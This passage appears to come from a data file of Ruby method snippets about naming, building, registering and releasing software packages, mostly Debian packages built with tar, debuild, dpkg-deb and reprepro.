[@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def manifest_name(name, pack_type)\n return name if File.extname(name.to_s).empty?\n File.basename(name, '.' + pack_type)\n end",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def manifest_name(name, pack_type)\n return name if File.extname(name.to_s).empty?\n File.basename(name, \".#{pack_type}\")\n end",
"def manifest_name(name, pack_type)\n return name if File.extname(name.to_s).empty?\n File.basename(name, \".#{pack_type}\")\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n Packager::Makeself.new(self).package_name\n when 'msi'\n Packager::MSI.new(self).package_name\n when 'bff'\n Packager::BFF.new(self).package_name\n when 'solaris'\n Packager::Solaris.new(self).package_name\n when 'pkg'\n Packager::PKG.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::PKG.new(self)\n Packager::MacDmg.new(pkg).package_name\n when 'rpm'\n Packager::RPM.new(self).package_name\n when 'deb'\n Packager::DEB.new(self).package_name\n else\n raise RuntimeError, \"I do not know how to build a `#{pkg_type}'!\"\n end\n end",
"def generateBuildNamePrefix()\n testflight_version_number = get_version_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n testflight_build_number = get_build_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n return \"CICD_\" + testflight_version_number.to_s + \"-\" + testflight_build_number.to_s\nend",
"def build_name(name)\n \"_design/#{name}\"\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def build_name\n \"#{manufacturer} #{weight} #{style} #{name}\"\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n ########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def get_java_ospkg_name (platform, version, type)\n pfx = \"#{platform.downcase == 'rhel' ? \"java-1.#{version}.0-\" :''}\"\n case platform.downcase\n when 'rhel'\n sfx = (type.downcase == 'jre' ? '' :'-devel')\n else\n sfx = \"-#{version}-\".concat(type.downcase == 'jre' ? 'jre' :'jdk')\n end\n \"#{pfx}openjdk#{sfx}\"\n end",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def generateDebugIpaName()\n prefix = generateBuildNamePrefix_Debug\n return prefix + \".ipa\"\nend",
"def project_name(new_name = T.unsafe(nil)); end",
"def design_name\n\n if 1 == 2 # self.part_number_id == 0\n design_name = self.prefix.pcb_mnemonic + self.number\n design_name += self.revision.name if self.revision && self.revision_id > 0\n \n case self.entry_type\n when 'dot_rev'\n design_name += self.numeric_revision.to_s if self.numeric_revision > 0\n when 'date_code'\n design_name += self.numeric_revision.to_s if self.numeric_revision && self.numeric_revision > 0\n design_name += '_eco'\n design_name += self.eco_number\n end\n \n \"#{design_name} (\" + \n self.prefix.pcb_number(self.number,\n self.revision.name,\n self.numeric_revision) + ')'\n else\n self.pcb_number\n end\n \n end",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def name\n return \"New Firmware\" if !id\n version + \" (\" + description.to_s + \") \" +\n \" (\" + (for_external ? \"internal\" : \"external\") + \")\"\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def release(options)\n options = options.rekey\n\n unixname = self.unixname\n\n package = options[:package] || metadata.name\n version = options[:version] || metadata.version\n\n date = options[:date] || metadata.released || Time::now.strftime('%Y-%m-%d %H:%M')\n\n changes = options[:changes] || project.history.releases[0].changes\n notes = options[:notes] || project.history.releases[0].note\n\n release = options[:release] || version\n\n files = options[:files] || options[:file] || []\n\n #store = options[:store] || 'pkg'\n\n processor = options[:processor] || 'Any'\n\n is_public = !options[:private]\n\n #raise ArgumentError, \"missing unixname\" unless unixname\n raise ArgumentError, \"missing package\" unless package\n raise ArgumentError, \"missing release\" unless release\n\n # package name has to be 3+ characters.\n if package.size < 3\n package = package + \"'s\"\n end\n\n # sub in for version if %s is used in release name.\n release = release % version if release.index(\"%s\")\n\n release_notes = notes\n release_changes = changes\n\n # Gather package files to release.\n if files.empty?\n files = find_packages(version)\n else\n files = files.map do |file|\n if File.directory?(file)\n find_packages(version, file)\n else\n file\n end\n end\n files = files.flatten\n end\n files = files.select{ |f| File.file?(f) }\n\n abort \"No package files.\" if files.empty?\n\n files.each do |file|\n abort \"Not a file -- #{file}\" unless File.exist?(file)\n puts \"Release file: #{File.basename(file)}\"\n end\n\n # which package types\n #rtypes = [ 'tgz', 'tbz', 'tar.gz', 'tar.bz2', 'deb', 'gem', 'ebuild', 'zip' ]\n #rtypes -= exclude\n #rtypes = rtypes.collect{ |rt| Regexp.escape( rt ) }\n #re_rtypes = Regexp.new('[.](' << rtypes.join('|') << ')$')\n\n puts \"Releasing #{package} #{release} to #{unixname} project...\" #unless options['quiet']\n\n login do\n\n raise ArgumentError, \"missing group_id\" unless group_id\n\n unless package_id = package?(package)\n if trial?\n puts \"Package '#{package}' does not exist.\"\n puts \"Create package #{package}.\"\n abort \"Cannot continue in trial mode.\"\n else\n #unless options['force']\n q = \"Package '#{package}' does not exist. Create?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #end\n puts \"Creating package #{package}...\"\n create_package(package, is_public)\n unless package_id = package?(package)\n raise \"Package creation failed.\"\n end\n end\n end\n if release_id = release?(release, package_id)\n #unless options[:force]\n if trial?\n puts \"Release #{release} already exists.\"\n else\n q = \"Release #{release} already exists. Re-release?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #puts \"Use -f option to force re-release.\"\n #return\n end\n files.each do |file|\n fname = File.basename(file)\n if file_id = file?(fname, package)\n if trial?\n puts \"Remove file #{fname}.\"\n else\n puts \"Removing file #{fname}...\"\n remove_file(file_id, release_id, package_id)\n end\n end\n if trial?\n puts \"Add file #{fname}.\"\n else\n puts \"Adding file #{fname}...\"\n add_file(file, release_id, package_id, processor)\n end\n end\n else\n if trial?\n puts \"Add release #{release}.\"\n else\n puts \"Adding release #{release}...\"\n add_release(release, package_id, files,\n :processor => processor,\n :release_date => date,\n :release_changes => release_changes,\n :release_notes => release_notes,\n :preformatted => '1'\n )\n unless release_id = release?(release, package_id)\n raise \"Release creation failed.\"\n end\n end\n #files.each do |file|\n # puts \"Added file #{File.basename(file)}.\"\n #end\n end\n end\n puts \"Release complete!\" unless trial?\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def split_name_package(fullname)\n fixing = fullname.gsub(/:/, \".\")\n split = fixing.match(/^(?:((?:\\w+\\.?)*)\\.)?(\\w+)$/) || []\n name = split[2] || \"\"\n package = split[1] || \"\"\n # downcase the first letter of each package name\n package = package.split(\".\").map {|s| s[0].downcase+s[1..-1]}.join(\".\")\n [name, package]\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def package_name\n raise NotImplementedError\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def build_host_name\n if @build_host_template_name.nil?\n validate_platform\n @build_host_template_name = @platform.vmpooler_template\n end\n\n @build_host_template_name\n end",
"def live_name\n [\n transformed_part('product'),\n middle_name(standalone: false), # Will have word dividers on either side\n idx,\n maybe_upto,\n '-',\n parts['sku'] =~ /editorial/ && bang? ? 'square-' : nil,\n [name_base, ext_name].join\n ].compact.join\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def getNameForPrecompiled\n sanitizeForPath(\"#{@Name}_#{@Version}_\" +\n (@BranchEpoch ? \"sv_#{@BranchEpoch}_\" : '') +\n \"opts_#{optionsHash}\")\n end",
"def make_name(template, clim, building_type, spc_type)\n clim = clim.gsub('ClimateZone ', 'CZ')\n if clim == 'CZ1-8'\n clim = ''\n end\n\n if building_type == 'FullServiceRestaurant'\n building_type = 'FullSrvRest'\n elsif building_type == 'Hospital'\n building_type = 'Hospital'\n elsif building_type == 'LargeHotel'\n building_type = 'LrgHotel'\n elsif building_type == 'LargeOffice'\n building_type = 'LrgOffice'\n elsif building_type == 'MediumOffice'\n building_type = 'MedOffice'\n elsif building_type == 'Mid-riseApartment'\n building_type = 'MidApt'\n elsif building_type == 'Office'\n building_type = 'Office'\n elsif building_type == 'Outpatient'\n building_type = 'Outpatient'\n elsif building_type == 'PrimarySchool'\n building_type = 'PriSchl'\n elsif building_type == 'QuickServiceRestaurant'\n building_type = 'QckSrvRest'\n elsif building_type == 'Retail'\n building_type = 'Retail'\n elsif building_type == 'SecondarySchool'\n building_type = 'SecSchl'\n elsif building_type == 'SmallHotel'\n building_type = 'SmHotel'\n elsif building_type == 'SmallOffice'\n building_type = 'SmOffice'\n elsif building_type == 'StripMall'\n building_type = 'StMall'\n elsif building_type == 'SuperMarket'\n building_type = 'SpMarket'\n elsif building_type == 'Warehouse'\n building_type = 'Warehouse'\n end\n\n parts = [template]\n\n unless building_type.empty?\n parts << building_type\n end\n\n unless spc_type.nil?\n parts << spc_type\n end\n\n unless clim.empty?\n parts << clim\n end\n\n result = parts.join(' - ')\n\n @created_names << result\n\n return result\n end",
"def is_deb?\n return !!@name.match(/^(debian|ubuntu|cumulus|huaweios)-.*$/)\n end",
"def detailed_name\n \"#{label} ( #{name}_V#{version} )\"\n end",
"def build_host_name\n if @platform.abs_resource_name\n @platform.abs_resource_name\n elsif @platform.vmpooler_template\n @platform.vmpooler_template\n else\n @platform.name\n end\n end",
"def build_host_name\n if @platform.abs_resource_name\n @platform.abs_resource_name\n elsif @platform.vmpooler_template\n @platform.vmpooler_template\n else\n @platform.name\n end\n end",
"def require_convert(k, v, prefix, klass)\n\n # package type/name maps\n map = { FPM::Package::RPM => :rpm, FPM::Package::Deb => :deb, FPM::Package::Phar => :phar }\n typ = map.include?(klass) ? map[klass] : :deb\n pn = {\n :php => { :phar => \"php\", :deb => \"php5-common\", :rpm => \"php(language)\" },\n :ext => { :phar => \"ext:\", :deb => \"php5-\", :rpm => \"php-\" },\n :lib => { :phar => \"sys:lib\", :deb => \"lib\", :rpm => \"lib\" },\n :bin => { :phar => \"bin:\", :deb => \"\", :rpm => \"/usr/bin/\" }\n }\n\n # package names, magic values\n case k = k.strip.gsub(/\\W+/, \"-\")\n when /^php(-32bit|-64bit)?|^hhvm|^quercus/\n k = pn[:php][typ]\n @architecture = ($1 == \"-32bit\") ? \"x86\" : \"amd64\" if $1\n when /^(ext|lib|bin)-(\\w+)$/\n k = pn[$1.to_sym][typ] + $2\n else\n k = prefix + k\n end\n\n # expand version specifiers (this is intentionally incomplete)\n if attributes[:no_depends_given?]\n v = \"\"\n else\n v = v.split(\",\").map {\n |v|\n case v = ver(v, typ)\n when \"*\"\n \"\"\n when /^[\\d.-]+~*$/ # 1.0.1\n \" = #{v}\"\n when /^((\\d+\\.)*(\\d+))\\.\\*/ # 1.0.*\n [\" >= #{$1}.0\", \" <= #{$1}.999\"]\n when /^([!><=]*)([\\d.-]+~*)$/ # >= 2.0 # debianize_op() normalizes >, <, = anyway\n \" #{$1} #{$2}\"\n when /^~\\s*([\\d.-]+~*)$/ # ~2.0 # deb.fix_dependency translates that into a range [\"pkg(>=1)\", \"pkg(<<2)\"]\n \" ~> #{$1}\"\n else\n \"\"\n end\n }\n end\n return k ? v.flatten.map { |v| k + v } : nil\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def create_package(logger:, release_model:, fix:, compiled_release:, package_meta:, release_dir:)\n name = package_meta['name']\n version = package_meta['version']\n\n package_attrs = {\n release: release_model,\n name: name,\n sha1: nil,\n blobstore_id: nil,\n fingerprint: package_meta['fingerprint'],\n version: version,\n }\n\n package = Models::Package.new(package_attrs)\n package.dependency_set = package_meta['dependencies']\n\n save_package_source_blob(logger, package, fix, package_meta, release_dir) unless compiled_release\n\n package.save\n end",
"def deregister_debian_package(pkg_name_expression, release_name, codename, exactmatch = false)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n logfile = File.join(log_dir,\"deregistration-reprepro-#{release_name}-#{codename}.log\")\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n\n if exactmatch\n cmd << \"remove\" << codename << pkg_name_expression\n else\n cmd << \"removematched\" << codename << pkg_name_expression\n end\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n Packager.info \"Remove existing package matching '#{pkg_name_expression}': #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n Packager.info \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n else\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n cmd << \"deleteunreferenced\"\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def set_version_name!\n if patterns = @name.match(/^(.*) \\[(.*)\\](.*)$/)\n @name = \"#{patterns[1]}#{patterns[3]}\"\n @version_name = patterns[2]\n end\n end",
"def generate_intended_filename_regex conf\n prefix = \"#{ conf['local_hostname'] }-\\\\d{4}_\\\\d{2}_\\\\d{2}\"\n case conf['type']\n when /dir/\n dir_part = conf['path'].sub(/\\//,'').gsub(/\\//,\"-\")\n return \"#{ prefix }-#{ dir_part }\\\\.tar\\\\.gz\"\n when /mys/\n db_part = conf['database']\n return \"#{ prefix }-#{ db_part }\\\\.sql\\\\.gz\"\n end\nend",
"def package(name)\n if name.respond_to? :cache_path\n name\n elsif @versions[name]\n Package.for(@sources[name], @versions[name], @files[name])\n end\n end",
"def generate_run_name(test_type)\n time = Time.new\n spot_name = \"0312_\" + time.year.to_s + time.month.to_s + \"00\" +\n time.day.to_s + \"_1_SP\" \n library_name = \"\" \n \n if test_type.eql?(\"mp\")\n library_name = \"ANG_TEST_1_1pA_0100\" + rand(999999).to_s + \"_1\"\n else\n library_name = \"ANG_TEST_1_1sA_0100\" + rand(999999).to_s + \"_1\" \n end\n return spot_name + \"_\" + library_name\nend",
"def formatted_filename(name, version, suffix, extension)\n name.gsub(\"#{version}_\", \"\").chomp(File.extname(name)) + \"_#{suffix}.#{extension}\"\n end",
"def generate_run_name\n return super if CodeRunner::GLOBAL_OPTIONS[:short_run_name]\n @run_name = %[v#@version] + @naming_pars.inject(\"\") do |str, par|\n case par\n when :flux_pars\n str+=\"_flx_#{send(par).map{|k,v| \"#{k}_#{v.to_s[0..8]}\"}.join(\"_\")}}\"\n else\n str+=\"_#{par}_#{send(par).to_s[0...8]}\"\n end\n end\n @run_name = @run_name.gsub(/\\s+/, \"_\").gsub(/[\\/{}\"><:=]/, '') + \"_id_#@id\"\n end",
